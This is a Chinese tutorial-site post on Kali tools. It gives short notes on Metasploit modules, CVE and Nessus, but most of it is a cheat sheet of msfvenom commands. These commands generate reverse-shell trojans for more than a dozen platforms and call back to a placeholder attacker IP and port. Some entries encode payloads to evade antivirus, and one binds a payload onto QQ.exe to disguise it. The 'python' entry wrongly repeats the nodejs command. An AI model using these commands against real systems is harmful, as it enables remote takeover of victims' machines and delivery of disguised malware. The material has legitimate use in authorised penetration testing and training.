java开发环境变量 Transformer csv flask ansible vue的优点 linux内存管理 php抽奖源码 datetimepicker赋值 java数据分析 matlab生成对角矩阵 quartz配置 查看mysql是否启动 bootstrap居中对齐 mysql删除表 python读取数据库 python当前日期 python平台 python中import用法 python写入文件 java数组反转 java抽象 java获取数据类型 java遍历list集合 java删除 iphone滚动截屏 笔记本外接显示器好吗 视频字幕提取器 战地联盟辅助 无限视距 古风头像女动漫 iframe跨域 桌面数字时钟 大势至usb监控 羽毛球拍握法 谷歌浏览器访问助手 linux格式化硬盘 Mapper ps字体描边 linux解压
当前位置: 首页 > 学习教程  > 编程语言

Kali 常用工具

2020/9/19 15:27:23 文章标签:

MSF

Metasploit Framework 开源工具,方便进行渗透测试。Ruby开发的

Auxiliaries(辅助模块):负责扫描、嗅探、指纹识别等功能

Exploit(漏洞利用模块):利用安全漏洞进行攻击行为

Payload(有效载荷模块):在渗透攻击之后,用于在目标系统上执行任意命令或者执行特定的代码

Post(后期渗透模块):用于在取得目标系统远程控制权限后,进行一系统的后渗透攻击动作

Encoders(编码工具模块):主要负责免杀

CVE

Common Vulnerabiluities & Exposures(公共漏洞和暴露)

为每个漏洞和暴露破了唯一的名称

给每个漏洞和暴露一个标准化的描述

不是一个数据库面,而是一个字典

任何完全迥异的漏洞库都可以用同一个语言表述

由于语言统一可以使得安全事件报告更好地被理解,实现更好的协调工作

可以成为评价相应工具和数据库的基准

MSF载荷选择

windows/meterpreter/reverse_tcp

java/meterpreter/reverse_tcp

php/meterpreter/reverse_tcp

php/meterpreter_reverse_tcp

ruby/shell_reverse_tcp

cmd/unix/interact

cmd/unix/reverse

cmd/unix/reverse_perl

cmd/unix/reverse_netcat_gaping

windows/meterpreter/reverse_nonx_tcp

windows/meterpreter/reverse_ord_tcp

windows/shell/reverse_tcp

generic/shell_reverse_tcp

msfvenom各平台木马生成

windows

msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -o payload.exe — 编码3次以exe输出, 输文件名字叫payload

msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -x D:/QQ.exe -i 5 -f exe -o c:/QQ1.exe —附加在qq.exe上,进行5次编码后以exe文件输出,输出的名字叫qq1

mac

msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

powershell

msfvenom -a x86 —platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux

msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

php

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘n’ > shell.php && pbpaste >>shell.php

aspx

msfvenom -a x86 —platform windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp

msfvenom —platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.war

node js

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js

python

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js

perl

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

lua

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

windows shellCode

msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

Linux Shell

msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac shell

msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPLPORT=攻击机端口 -f c

Nessus

目前世界上最多人使用的系统漏洞扫描与分析软件

号称世界上最流行的漏洞扫描程序

Nessus提供了完整的漏洞扫描服务,并随时更新漏洞库。Nessus提供服务器和WEB客户端

安装过程 :https://blog.csdn.net/wwl012345/article/details/96998187


本文链接: http://www.dtmao.cc/news_show_200247.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?